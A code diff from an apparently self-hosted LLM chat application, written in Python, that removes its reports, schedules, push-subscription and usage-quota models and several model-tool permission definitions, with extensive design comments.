|
||||
from __future__ import annotations
|
||||
|
||||
from sqlalchemy import Boolean, ForeignKey, String, Text
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
|
||||
|
||||
# Where a report came from. Not a foreign key to anything -- see `source_id`.
|
||||
SOURCE_SCHEDULE = "schedule"
|
||||
SOURCE_CHAT = "chat"
|
||||
SOURCE_MANUAL = "manual"
|
||||
SOURCES = (SOURCE_SCHEDULE, SOURCE_CHAT, SOURCE_MANUAL)
|
||||
|
||||
|
||||
class Report(UUIDPrimaryKey, Timestamps, Base):
|
||||
"""A finished piece of work, filed.
|
||||
|
||||
Deliberately not a `Chat` with one `Message` in it. A report is read top to
|
||||
bottom and never answered, so everything a conversation carries -- a
|
||||
composer, a sidebar row, a title that regenerates itself, a bubble with an
|
||||
avatar and a rewind button -- would be machinery to suppress rather than
|
||||
machinery to use. It is the same line `services/library/` already draws
|
||||
between a note and a chat: a durable artefact is not a turn.
|
||||
|
||||
It must also be writable with no chat behind it at all, being the fallback
|
||||
destination for a scheduled run whose own chat has gone.
|
||||
|
||||
`body` is Markdown written by a model and goes through
|
||||
`services/markdown.py` like everything else from an endpoint. Hard rule 6
|
||||
applies here exactly as it does in a transcript.
|
||||
"""
|
||||
|
||||
__tablename__ = "reports"
|
||||
|
||||
owner_id: Mapped[str] = mapped_column(
|
||||
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
|
||||
)
|
||||
title: Mapped[str] = mapped_column(String(300), nullable=False)
|
||||
# One line for the list page, so a feed of forty reports can be read without
|
||||
# opening any of them. Written by the model beside the body; falls back to
|
||||
# the body's first line when it did not bother.
|
||||
summary: Mapped[str] = mapped_column(String(500), default="")
|
||||
body: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
source: Mapped[str] = mapped_column(String(16), default=SOURCE_MANUAL, nullable=False)
|
||||
# The chat or the schedule this came out of, kept so a report can say where
|
||||
# it was made. Deliberately not a ForeignKey: `migrations.py` compiles the
|
||||
# column type only, so a REFERENCES clause would exist on a fresh database
|
||||
# and not on an upgraded one -- the same reason `Chat.compacted_through_id`
|
||||
# and `Folder.ssh_profile_id` are plain ids. Both are validated on read, and
|
||||
# the row outliving what it points at is normal rather than exceptional: a
|
||||
# report is worth keeping after the chat that produced it has been deleted.
|
||||
source_id: Mapped[str] = mapped_column(String(32), default="")
|
||||
schedule_id: Mapped[str] = mapped_column(String(32), default="")
|
||||
model_id: Mapped[str] = mapped_column(String(300), default="")
|
||||
|
||||
# NOT NULL with a scalar default so `migrations._add_column_sql` can backfill
|
||||
# it if this column is ever added to a table that already has rows.
|
||||
unread: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
|
||||
# Whether its arrival has already been announced. The dot can be shown for
|
||||
# as long as it is unread; the toast and the browser notification must fire
|
||||
# once. Without this the poll would announce the same report every ten
|
||||
# seconds until somebody opened it, which is the shape of notification
|
||||
# nobody leaves switched on. `Chat.unread_notified` exists for exactly this
|
||||
# and this is the same pair.
|
||||
unread_notified: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
|
||||
# Why a run produced nothing worth reading. A scheduled report that failed
|
||||
# is still a report -- one that silently did not appear is indistinguishable
|
||||
# from a schedule that never fired.
|
||||
error: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
def __repr__(self) -> str:
|
||||
return f"<Report {self.title!r}>"
|
||||
@@ -1,85 +0,0 @@
|
||||
"""Schedules: what should happen later, and where its result goes."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import datetime
|
||||
|
||||
from sqlalchemy import Boolean, DateTime, ForeignKey, Integer, String, Text
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
|
||||
from lembas.db.types import JSONDict
|
||||
|
||||
# Where a firing's result is delivered. Chosen per schedule rather than fixed by
|
||||
# the screen it was made on: Reports has to stay reachable from anywhere, being
|
||||
# the fallback, and a schedule somebody wants moved from its own chat to Reports
|
||||
# should not have to be built again.
|
||||
TARGET_CHAT = "chat"
|
||||
TARGET_REPORT = "report"
|
||||
TARGET_MESSAGES = "messages"
|
||||
TARGETS = (TARGET_CHAT, TARGET_REPORT, TARGET_MESSAGES)
|
||||
|
||||
# Who made it. Kept because "why is this running?" is a question with two very
|
||||
# different answers, and one of them is "a model decided to".
|
||||
ORIGIN_USER = "user"
|
||||
ORIGIN_MODEL = "model"
|
||||
ORIGINS = (ORIGIN_USER, ORIGIN_MODEL)
|
||||
|
||||
|
||||
class Schedule(UUIDPrimaryKey, Timestamps, Base):
|
||||
"""One standing instruction and when it comes due.
|
||||
|
||||
The row carries no recurrence logic at all: `rule_json` is read by
|
||||
`services/schedule/rule.py`, which is pure and knows nothing about rows.
|
||||
What lives here is the bookkeeping the ticker needs to claim a firing
|
||||
without doing it twice.
|
||||
"""
|
||||
|
||||
__tablename__ = "schedules"
|
||||
|
||||
user_id: Mapped[str] = mapped_column(
|
||||
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
|
||||
)
|
||||
title: Mapped[str] = mapped_column(String(200), nullable=False, default="")
|
||||
|
||||
# What the reader actually typed, kept verbatim and for ever. The compile
|
||||
# rewrites it into `instruction`, and "what did I actually ask for" has to
|
||||
# survive that -- both so the edit form can show it and so a recompile has
|
||||
# something to work from other than its own previous output.
|
||||
request: Mapped[str] = mapped_column(Text, default="")
|
||||
# What is sent when it fires. The compiled form: standalone, since it is
|
||||
# read with no conversation around it.
|
||||
instruction: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
rule_json: Mapped[dict] = mapped_column(JSONDict, default=dict)
|
||||
|
||||
target: Mapped[str] = mapped_column(String(16), default=TARGET_CHAT, nullable=False)
|
||||
# The chat this fires into. Deliberately not a ForeignKey -- `migrations.py`
|
||||
# compiles the column type only, so a REFERENCES clause would exist on a
|
||||
# fresh database and not on an upgraded one. Validated on read, and a
|
||||
# dangling value disables the schedule rather than raising every tick.
|
||||
chat_id: Mapped[str] = mapped_column(String(32), default="")
|
||||
model_id: Mapped[str] = mapped_column(String(300), default="")
|
||||
|
||||
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
|
||||
|
||||
# The ticker's entire query. Nullable because "nothing more to do" is a real
|
||||
# state -- a spent count, a closed window, a calendar matching nothing --
|
||||
# and is different from "due at the epoch".
|
||||
next_fire_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True), index=True)
|
||||
last_fire_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
|
||||
# Stamped when a firing starts and cleared when it finishes, so a run that
|
||||
# died halfway says so instead of looking like one that never happened.
|
||||
claimed_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
|
||||
|
||||
fired_count: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
# Why the last run did not work. Shown on the schedule's own page: a
|
||||
# schedule that silently stopped producing anything is indistinguishable
|
||||
# from one that was never due.
|
||||
last_error: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
origin: Mapped[str] = mapped_column(String(16), default=ORIGIN_USER, nullable=False)
|
||||
compiled_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
|
||||
|
||||
def __repr__(self) -> str:
|
||||
return f"<Schedule {self.title!r} {'on' if self.enabled else 'off'}>"
|
||||
@@ -5,18 +5,7 @@ from __future__ import annotations
|
||||
from datetime import datetime
|
||||
from typing import TYPE_CHECKING, Any
|
||||
|
||||
from sqlalchemy import (
|
||||
Boolean,
|
||||
Column,
|
||||
DateTime,
|
||||
ForeignKey,
|
||||
Index,
|
||||
Integer,
|
||||
String,
|
||||
Table,
|
||||
Text,
|
||||
UniqueConstraint,
|
||||
)
|
||||
from sqlalchemy import Boolean, Column, DateTime, ForeignKey, Index, String, Table, Text
|
||||
from sqlalchemy.orm import Mapped, mapped_column, relationship
|
||||
|
||||
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
|
||||
@@ -80,16 +69,6 @@ class Group(UUIDPrimaryKey, Timestamps, Base):
|
||||
# lembas.security.permissions.
|
||||
permissions_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
|
||||
|
||||
# What members of this group may spend. Resolved across a user's groups by
|
||||
# **maximum**, which is the union rule applied to numbers: being in a second
|
||||
# group can only ever grant more. Zero means "no limit" and therefore wins
|
||||
# outright, because a group that says "unlimited" saying less than one that
|
||||
# says "a million" would be the union rule inverted for one value.
|
||||
#
|
||||
# Absent keys mean the group has no opinion and contribute nothing. See
|
||||
# security/permissions.py:limits_for.
|
||||
limits_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
|
||||
|
||||
users: Mapped[list[User]] = relationship(secondary=user_groups, back_populates="groups")
|
||||
models: Mapped[list[Model]] = relationship(
|
||||
"Model", secondary="model_groups", back_populates="groups"
|
||||
@@ -126,87 +105,3 @@ class Session(UUIDPrimaryKey, Timestamps, Base):
|
||||
|
||||
|
||||
Index("ix_sessions_user_id", Session.user_id)
|
||||
|
||||
|
||||
class PushSubscription(UUIDPrimaryKey, Timestamps, Base):
|
||||
"""One browser, on one device, that has agreed to be told.
|
||||
|
||||
Per device rather than per account, and that is not a detail: the permission
|
||||
and the subscription both belong to a browser, so somebody signed in on a
|
||||
laptop and a phone has two of these and revoking one must not silence the
|
||||
other. It is also why there is no "notifications on" column on `User` -- the
|
||||
presence of a row here *is* the state, and it cannot drift from what the
|
||||
browser thinks.
|
||||
|
||||
`endpoint` is chosen by the browser vendor and is the address their push
|
||||
service will accept a message at. Unique, because a browser that
|
||||
re-subscribes hands back the same one and two rows would mean two
|
||||
notifications for one arrival.
|
||||
|
||||
`p256dh` and `auth_secret` are the browser's half of the encryption. Stored
|
||||
as the browser gave them, base64url: they are public key material and a
|
||||
per-subscription salt, not credentials -- what they protect is the payload,
|
||||
and a database holding them can already read everything the payload could
|
||||
say. See services/push.py.
|
||||
"""
|
||||
|
||||
__tablename__ = "push_subscriptions"
|
||||
|
||||
user_id: Mapped[str] = mapped_column(
|
||||
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False
|
||||
)
|
||||
endpoint: Mapped[str] = mapped_column(Text, unique=True, nullable=False)
|
||||
p256dh: Mapped[str] = mapped_column(String(255), nullable=False)
|
||||
auth_secret: Mapped[str] = mapped_column(String(64), nullable=False)
|
||||
# Which device this is, for a list somebody can revoke from. Whatever the
|
||||
# browser says about itself, trimmed; never parsed.
|
||||
label: Mapped[str] = mapped_column(String(200), default="")
|
||||
# The last refusal from the push service, kept so a subscription that has
|
||||
# stopped working says why rather than being silently useless. A 404 or 410
|
||||
# deletes the row instead -- that is the end of its life, not a fault.
|
||||
last_error: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
user: Mapped[User] = relationship()
|
||||
|
||||
|
||||
Index("ix_push_subscriptions_user_id", PushSubscription.user_id)
|
||||
|
||||
|
||||
class Usage(UUIDPrimaryKey, Timestamps, Base):
|
||||
"""What one account spent in one period.
|
||||
|
||||
A row per user per period rather than a row per reply. A per-reply ledger is
|
||||
what somebody eventually wants for a bill; this exists to answer one
|
||||
question on the request path -- "has this account used its month?" -- and
|
||||
that question wants one indexed lookup, not a sum over ten thousand rows.
|
||||
|
||||
`period` is a plain "YYYY-MM" string in **UTC**. Not the reader's timezone:
|
||||
a quota that resets at a different instant for each member of a group is a
|
||||
quota nobody can reason about, and the month boundary is not something
|
||||
anybody experiences to the hour.
|
||||
|
||||
Written by `generation._persist`, which is the single writer for everything
|
||||
a reply produced, so a reply that is stopped or errors still records what it
|
||||
spent -- an endpoint charges for tokens it generated whether or not the
|
||||
reply was wanted.
|
||||
"""
|
||||
|
||||
__tablename__ = "usage"
|
||||
__table_args__ = (UniqueConstraint("user_id", "period", name="uq_usage_user_period"),)
|
||||
|
||||
user_id: Mapped[str] = mapped_column(
|
||||
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
|
||||
)
|
||||
period: Mapped[str] = mapped_column(String(7), nullable=False)
|
||||
|
||||
prompt_tokens: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
completion_tokens: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
replies: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
# Counted separately because it is its own quota: one picture is a minute of
|
||||
# somebody's GPU and no tokens at all, so a token budget says nothing about
|
||||
# it. `images_today` on the resolved limits is the daily half; this is the
|
||||
# month's running total, for the admin screen.
|
||||
images: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
|
||||
def __repr__(self) -> str:
|
||||
return f"<Usage {self.user_id} {self.period}>"
|
||||
|
||||
+8
-94
@@ -16,39 +16,26 @@ from lembas.api import (
|
||||
admin,
|
||||
admin_agents,
|
||||
admin_audio,
|
||||
admin_branding,
|
||||
admin_extraction,
|
||||
admin_images,
|
||||
admin_models,
|
||||
admin_prompts,
|
||||
admin_schedules,
|
||||
admin_search,
|
||||
admin_suggestions,
|
||||
admin_tools,
|
||||
admin_updates,
|
||||
admin_users,
|
||||
agents,
|
||||
audio,
|
||||
auth,
|
||||
branding,
|
||||
canvas,
|
||||
chats,
|
||||
files,
|
||||
folders,
|
||||
library,
|
||||
messages,
|
||||
pages,
|
||||
preferences,
|
||||
push,
|
||||
reports,
|
||||
schedules,
|
||||
sharing,
|
||||
terminal,
|
||||
)
|
||||
from lembas.api.deps import RedirectToLogin, is_htmx, login_redirect
|
||||
from lembas.config import settings
|
||||
from lembas.db.session import init_db
|
||||
from lembas.services.library import indexing
|
||||
from lembas.web.templating import STATIC_DIR, render
|
||||
|
||||
log = logging.getLogger("lembas")
|
||||
@@ -83,7 +70,6 @@ async def lifespan(app: FastAPI) -> AsyncIterator[None]:
|
||||
from lembas.services.chat import sweep_temporary
|
||||
from lembas.services.files import sweep_orphans
|
||||
from lembas.services.library.documents import sweep_unfiled
|
||||
from lembas.services.library.indexing import sweep_orphans as sweep_chunks
|
||||
from lembas.services.suggestions import seed_defaults as seed_suggestions
|
||||
|
||||
with session_scope() as db:
|
||||
@@ -94,74 +80,25 @@ async def lifespan(app: FastAPI) -> AsyncIterator[None]:
|
||||
# Temporary chats older than a day. Startup only, like the sweeps
|
||||
# above it -- see services/chat.py:sweep_temporary.
|
||||
sweep_temporary(db)
|
||||
# Chunks whose record has gone. A backstop for a delete that
|
||||
# happened with no event loop to schedule the tidy-up -- a CLI
|
||||
# command, or a cascade from removing an account.
|
||||
sweep_chunks(db)
|
||||
# Three starting points on the empty screen, written once ever.
|
||||
seed_suggestions(db)
|
||||
except Exception: # noqa: BLE001 - housekeeping must never block startup
|
||||
log.exception("orphaned upload sweep failed")
|
||||
|
||||
# Background jobs that were still running when we last stopped keep running
|
||||
# on their own hosts; pick their watchers back up so the model is still
|
||||
# woken when they finish. Best-effort, and inside the loop so its tasks land
|
||||
# in this event loop.
|
||||
try:
|
||||
from lembas.services.agent.jobs import rehydrate as rehydrate_jobs
|
||||
|
||||
rehydrate_jobs()
|
||||
except Exception: # noqa: BLE001 - a job that cannot be rehydrated is not fatal
|
||||
log.exception("could not rehydrate background jobs")
|
||||
|
||||
# Schedules. `release_claims` first, because a firing interrupted by the
|
||||
# last shutdown left a claim stamp that would otherwise read as permanently
|
||||
# running. Then the ticker, started here rather than lazily like the
|
||||
# terminal reaper: a schedule can be due at startup with nobody logged in,
|
||||
# which is most of the point of having one. Inside the loop, so its tasks
|
||||
# land in this event loop.
|
||||
#
|
||||
# Catching up on what was missed is deliberately NOT done here. It lives in
|
||||
# the sweep, because a suspended laptop, a paused container and a long stall
|
||||
# all reproduce "its time passed while nothing was running" with no restart
|
||||
# for a startup hook to hang on.
|
||||
try:
|
||||
from lembas.services.schedule.ticker import release_claims
|
||||
from lembas.services.schedule.ticker import start as start_ticker
|
||||
|
||||
released = release_claims()
|
||||
if released:
|
||||
log.info("released %s interrupted schedule claim(s)", released)
|
||||
start_ticker()
|
||||
except Exception: # noqa: BLE001 - scheduling failing must not block startup
|
||||
log.exception("could not start the schedule ticker")
|
||||
|
||||
log.info("LLeMbas %s starting on http://%s:%s", __version__, settings.host, settings.port)
|
||||
log.info("data directory: %s", settings.data_dir.resolve())
|
||||
yield
|
||||
|
||||
# Replies still being written are cancelled and persisted with whatever
|
||||
# they have, rather than left as permanently unfinished rows.
|
||||
from lembas.services.agent.jobs import shutdown as stop_jobs
|
||||
from lembas.services.agent.terminal import shutdown as stop_terminals
|
||||
from lembas.services.generation import shutdown as stop_generations
|
||||
from lembas.services.schedule.ticker import shutdown as stop_ticker
|
||||
|
||||
# Before the generations, so nothing new is fired into a chat whose reply is
|
||||
# about to be cancelled and persisted.
|
||||
await stop_ticker()
|
||||
await stop_generations()
|
||||
# Open shells have nothing to persist: whatever was running on the far side
|
||||
# is cut off mid-command. Every deploy does this, and the panel is told why
|
||||
# rather than left to guess -- see deploy/README.md.
|
||||
await stop_terminals()
|
||||
# Background jobs are the exception: cancelling a watcher does NOT stop the
|
||||
# detached remote job, which keeps running and is rehydrated on the next
|
||||
# start. Only the watching stops here.
|
||||
await stop_jobs()
|
||||
# A chunk set is written whole or not at all, so cancelling loses nothing
|
||||
# a rebuild does not pick up again.
|
||||
await indexing.shutdown()
|
||||
log.info("LLeMbas stopped")
|
||||
|
||||
|
||||
@@ -177,42 +114,25 @@ def create_app() -> FastAPI:
|
||||
|
||||
app.mount("/static", StaticFiles(directory=str(STATIC_DIR)), name="static")
|
||||
|
||||
# One place that notices a library record changing, rather than a call in
|
||||
# each of the ten writers that touch those tables. Idempotent, because the
|
||||
# factory is called per test. See services/library/indexing.py:install.
|
||||
indexing.install()
|
||||
|
||||
app.include_router(pages.router)
|
||||
app.include_router(auth.router)
|
||||
app.include_router(preferences.router)
|
||||
app.include_router(chats.router)
|
||||
app.include_router(canvas.router)
|
||||
app.include_router(terminal.router)
|
||||
app.include_router(audio.router)
|
||||
app.include_router(files.router)
|
||||
app.include_router(folders.router)
|
||||
app.include_router(library.router)
|
||||
app.include_router(messages.router)
|
||||
app.include_router(reports.router)
|
||||
app.include_router(schedules.router)
|
||||
app.include_router(agents.router)
|
||||
app.include_router(sharing.router)
|
||||
app.include_router(admin.router)
|
||||
app.include_router(admin_users.router)
|
||||
app.include_router(admin_updates.router)
|
||||
app.include_router(admin_models.router)
|
||||
app.include_router(admin_audio.router)
|
||||
app.include_router(admin_branding.router)
|
||||
app.include_router(admin_extraction.router)
|
||||
app.include_router(admin_search.router)
|
||||
app.include_router(admin_schedules.router)
|
||||
app.include_router(admin_images.router)
|
||||
app.include_router(admin_prompts.router)
|
||||
app.include_router(admin_suggestions.router)
|
||||
app.include_router(admin_tools.router)
|
||||
app.include_router(admin_agents.router)
|
||||
app.include_router(push.router)
|
||||
app.include_router(branding.router)
|
||||
|
||||
register_error_handlers(app)
|
||||
return app
|
||||
@@ -243,7 +163,7 @@ def register_error_handlers(app: FastAPI) -> None:
|
||||
{
|
||||
"status_code": exc.status_code,
|
||||
"detail": exc.detail,
|
||||
"flavour": error_flavour(exc.status_code),
|
||||
"flavour": ERROR_FLAVOUR.get(exc.status_code, ERROR_FLAVOUR[500]),
|
||||
},
|
||||
status_code=exc.status_code,
|
||||
)
|
||||
@@ -257,24 +177,18 @@ def register_error_handlers(app: FastAPI) -> None:
|
||||
request,
|
||||
"error.html",
|
||||
{"status_code": 500, "detail": "Something went wrong.",
|
||||
"flavour": error_flavour(500)},
|
||||
"flavour": ERROR_FLAVOUR[500]},
|
||||
status_code=500,
|
||||
)
|
||||
|
||||
|
||||
# Flavour lives in error pages, empty states and theme names -- never in the
|
||||
# functional UI. See the working notes.
|
||||
#
|
||||
# The three lines themselves moved into `services/branding.py` with the rest of
|
||||
# what an administrator can replace. What is left here is the mapping from a
|
||||
# status code to which of them, which is not something anybody would want to
|
||||
# edit. `snapshot()` never raises, so an error page can still render its error
|
||||
# on an instance whose database is the thing that broke.
|
||||
def error_flavour(status_code: int) -> str:
|
||||
from lembas.services import branding
|
||||
|
||||
text = branding.snapshot().text
|
||||
return text.get(f"error_{status_code}") or text["error_500"]
|
||||
# functional UI. See CLAUDE.md.
|
||||
ERROR_FLAVOUR = {
|
||||
403: "Speak, friend, and enter. This door is not yours to open.",
|
||||
404: "Not all those who wander are lost. This page, however, is.",
|
||||
500: "The Road goes ever on, but this stretch of it has washed out.",
|
||||
}
|
||||
|
||||
|
||||
app = create_app()
|
||||
|
||||
@@ -86,24 +86,6 @@ PERMISSION_DEFS: tuple[PermissionDef, ...] = (
|
||||
True,
|
||||
"Chat",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.fetch",
|
||||
"Fetch a page",
|
||||
"Let a model retrieve one web page and read it, given its address. "
|
||||
"Addresses on this machine and this network are refused unless an "
|
||||
"administrator has allowed them.",
|
||||
True,
|
||||
"Chat",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.image",
|
||||
"Generate images",
|
||||
"Let a model draw a picture and show it in the conversation. Only "
|
||||
"offered when an image generator has been configured, and every "
|
||||
"generation spends time on whatever machine is running it.",
|
||||
True,
|
||||
"Chat",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.custom",
|
||||
"Use custom tools",
|
||||
@@ -146,39 +128,6 @@ PERMISSION_DEFS: tuple[PermissionDef, ...] = (
|
||||
False,
|
||||
"Agent",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.subagent",
|
||||
"Delegate to a helper",
|
||||
"Let a model hand a self-contained piece of work to a second one that "
|
||||
"runs on its own and reports back — reading and searching in parallel "
|
||||
"rather than one thing at a time. A helper cannot ask questions, "
|
||||
"cannot spawn helpers of its own, and can only do what this chat could "
|
||||
"already do without stopping to ask.",
|
||||
False,
|
||||
"Chat",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.persona",
|
||||
"Have a personality of its own",
|
||||
"Let a model keep and rewrite its own character, and keep its own read of "
|
||||
"how this person works — carried into every conversation rather than "
|
||||
"forgotten at the end of one. Every version is kept, both are visible, "
|
||||
"and either can be put back or deleted. A model cannot do this while "
|
||||
"running as somebody's helper or on a schedule.",
|
||||
False,
|
||||
"Chat",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.friend",
|
||||
"Ask another model",
|
||||
"Let a model put a question to one of the other models here and use the "
|
||||
"answer — a second opinion from something good at what it is bad at. "
|
||||
"It is told which models exist and what each is for, and it can only "
|
||||
"reach the ones this person could use themselves. The model answering "
|
||||
"cannot ask questions and cannot ask anyone else in turn.",
|
||||
False,
|
||||
"Chat",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.ask",
|
||||
"Be asked questions",
|
||||
@@ -187,42 +136,6 @@ PERMISSION_DEFS: tuple[PermissionDef, ...] = (
|
||||
True,
|
||||
"Chat",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.scratch",
|
||||
"Write in the canvas",
|
||||
"Let a model build something up in this chat's scratch document, which "
|
||||
"sits open beside the conversation and can be edited and attached to a "
|
||||
"message. It belongs to the chat and is not searchable afterwards.",
|
||||
True,
|
||||
"Chat",
|
||||
),
|
||||
PermissionDef(
|
||||
"schedule.use",
|
||||
"Schedule work",
|
||||
"Set things to run later, on their own — once, or on a repeating "
|
||||
"timetable. This spends model time with nobody at the keyboard, so it "
|
||||
"is a capability chosen on purpose rather than one everybody has.",
|
||||
False,
|
||||
"Scheduling",
|
||||
),
|
||||
PermissionDef(
|
||||
"reports.use",
|
||||
"Keep reports",
|
||||
"Read the Reports section: finished pieces of work filed for them to "
|
||||
"read later, by a model that was asked for one or by something that ran "
|
||||
"while they were away.",
|
||||
True,
|
||||
"Reports",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.report",
|
||||
"File reports",
|
||||
"Let a model write a report when it finishes a piece of work, and read "
|
||||
"back ones it filed earlier. A report is addressed to the reader and "
|
||||
"cannot be replied to, so this costs nothing but a place to put things.",
|
||||
True,
|
||||
"Reports",
|
||||
),
|
||||
PermissionDef(
|
||||
"audio.transcribe",
|
||||
"Dictate messages",
|
||||
@@ -247,15 +160,9 @@ PERMISSION_DEFS: tuple[PermissionDef, ...] = (
|
||||
PermissionDef(
|
||||
"library.share",
|
||||
"Share library items",
|
||||
"Give other people, or a group, access to their knowledge bases, notes, "
|
||||
"skills and reports. Sharing grants reading only — never changing, and "
|
||||
"never sharing on.",
|
||||
# On. It was off, which meant sharing shipped documented as done and
|
||||
# unreachable: the panel is only rendered for somebody who holds this,
|
||||
# so out of the box nobody could share anything and nothing said why.
|
||||
# An instance that wants it off can say so; one that never looked should
|
||||
# get the feature it was told it had.
|
||||
True,
|
||||
"Give other people, or a group, access to their documents, notes and "
|
||||
"skills. Sharing grants reading only.",
|
||||
False,
|
||||
"Library",
|
||||
),
|
||||
PermissionDef(
|
||||
@@ -288,53 +195,8 @@ PERMISSION_DEFS: tuple[PermissionDef, ...] = (
|
||||
True,
|
||||
"Library",
|
||||
),
|
||||
# --- Reading and writing, split where the difference matters ------------
|
||||
# Three gates cover both, and for these three the two halves are genuinely
|
||||
# different decisions: a model that may *read* somebody's notes and not add
|
||||
# to them is a reasonable thing to want, and until now `tools.notes` was one
|
||||
# switch over five tools.
|
||||
#
|
||||
# Not split for every gate. `tools.web_search` has no write half; `report`
|
||||
# is a write with no read worth withholding; `agent` has modes, which are a
|
||||
# finer instrument than a permission and are per chat. A permission that
|
||||
# answers "the same as that one" is a permission nobody should be asked
|
||||
# about -- the reasoning `schedule.use` already carries.
|
||||
#
|
||||
# **All three default on**, so an instance that never looks behaves exactly
|
||||
# as it did: `_family_allowed` reads them only to *narrow* what the gate
|
||||
# already allowed.
|
||||
PermissionDef(
|
||||
"tools.notes.write",
|
||||
"Write notes",
|
||||
"Let a model create, change and delete notes. Without it, it can still "
|
||||
"search and read the ones that are there.",
|
||||
True,
|
||||
"Library",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.memory.write",
|
||||
"Record memories",
|
||||
"Let a model add and forget short facts about this person. Without it, "
|
||||
"the memories it already has are still shown to it every turn.",
|
||||
True,
|
||||
"Library",
|
||||
),
|
||||
PermissionDef(
|
||||
"tools.skills.write",
|
||||
"Write skills",
|
||||
"Let a model write new skills and change existing ones. Without it, it "
|
||||
"follows the skills that are there and cannot add to them — which is "
|
||||
"the setting for an instance whose skills are curated by hand.",
|
||||
True,
|
||||
"Library",
|
||||
),
|
||||
)
|
||||
|
||||
# Gates whose read and write halves are separate permissions. Keyed on the gate,
|
||||
# with the permission derived as `tools.<gate>.write`, so adding a fourth is one
|
||||
# entry here and one PermissionDef above.
|
||||
SPLIT_GATES = ("notes", "memory", "skills")
|
||||
|
||||
PERMISSION_KEYS = tuple(d.key for d in PERMISSION_DEFS)
|
||||
DEFAULT_PERMISSIONS = {d.key: d.default for d in PERMISSION_DEFS}
|
||||
|
||||
@@ -377,128 +239,6 @@ def has(db: DBSession, user: User | None, key: str) -> bool:
|
||||
return resolve(db, user).get(key, False)
|
||||
|
||||
|
||||
def explain(db: DBSession, user: User | None) -> dict[str, dict]:
|
||||
"""Every permission, whether this user has it, and **where it came from**.
|
||||
|
||||
The question the admin screens could not answer. `resolve` has always
|
||||
computed the union and thrown the working away, so "why can this person do
|
||||
X?" meant opening every group they belong to and reading the grids by eye --
|
||||
which is exactly the simulation the union rule exists to avoid needing.
|
||||
|
||||
`source` is "admin" (bypassing everything), "baseline", or the names of the
|
||||
groups that granted it. A permission that is off has no source, because
|
||||
nothing granted it -- there is no such thing as a deny here to point at.
|
||||
"""
|
||||
keys = PERMISSION_KEYS
|
||||
if user is None:
|
||||
return {key: {"on": False, "source": []} for key in keys}
|
||||
if user.is_admin:
|
||||
return {key: {"on": True, "source": ["admin"]} for key in keys}
|
||||
|
||||
baseline = baseline_permissions(db)
|
||||
out: dict[str, dict] = {}
|
||||
for key in keys:
|
||||
sources = ["baseline"] if baseline.get(key) else []
|
||||
sources += [
|
||||
group.name for group in user.groups if (group.permissions_json or {}).get(key)
|
||||
]
|
||||
out[key] = {"on": bool(sources), "source": sources}
|
||||
return out
|
||||
|
||||
|
||||
# --- Quotas -------------------------------------------------------------------
|
||||
# What a group may raise, and what each number means. Every one of them is
|
||||
# **zero for no limit**, which is the convention `max_completion_tokens` and
|
||||
# `index_chars` already use here, and it is what makes "unlimited" sayable at all.
|
||||
#
|
||||
# Five axes rather than one, because they fail differently and a single "budget"
|
||||
# would have to pick an exchange rate between a token and a minute of somebody's
|
||||
# GPU. There isn't one.
|
||||
LIMIT_DEFS: tuple[tuple[str, str, str], ...] = (
|
||||
(
|
||||
"monthly_tokens",
|
||||
"Tokens a month",
|
||||
"Prompt and completion together, across every chat, reset on the first "
|
||||
"of the month. Reached, a reply says so before it spends anything "
|
||||
"rather than stopping half way through.",
|
||||
),
|
||||
(
|
||||
"concurrent_replies",
|
||||
"Replies at once",
|
||||
"How many of their chats may be writing at the same time. This is the "
|
||||
"one that stops one person queueing every other person's work behind "
|
||||
"them on a single endpoint.",
|
||||
),
|
||||
(
|
||||
"agent_seconds",
|
||||
"Longest agent reply",
|
||||
"Seconds of wall clock for one reply in an agent chat, if lower than "
|
||||
"the instance's own. Waiting for somebody to approve something does "
|
||||
"not count.",
|
||||
),
|
||||
(
|
||||
"images_per_day",
|
||||
"Images a day",
|
||||
"Each one is a minute of somebody's GPU and no tokens at all, so a "
|
||||
"token budget says nothing about it.",
|
||||
),
|
||||
(
|
||||
"helpers_per_reply",
|
||||
"Helpers per reply",
|
||||
"How many subagents one reply may send, if lower than the instance's "
|
||||
"own.",
|
||||
),
|
||||
)
|
||||
|
||||
LIMIT_KEYS = tuple(key for key, _, _ in LIMIT_DEFS)
|
||||
|
||||
